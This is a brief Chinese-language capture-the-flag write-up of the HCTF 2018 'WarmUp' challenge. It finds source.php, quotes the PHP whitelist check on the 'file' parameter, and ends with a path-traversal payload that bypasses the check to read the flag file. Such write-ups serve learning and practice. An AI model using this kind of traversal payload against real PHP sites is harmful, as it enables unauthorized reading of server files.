[HCTF 2018]WarmUp

[HCTF 2018]WarmUp

打开看到什么也没有提示，f12查看网页源代码

看到到了source.php,进行访问

看到了一大串的php代码，尝试进行解读

大致意思是满足三个条件会看到REQUEST['file']

if ( !empty($_REQUEST['file'])
&& is_string($_REQUEST['file'])
&& emmm::checkFile($_REQUEST['file'] )

source.php?file=source.php?/../../../../ffffllllaaaagggg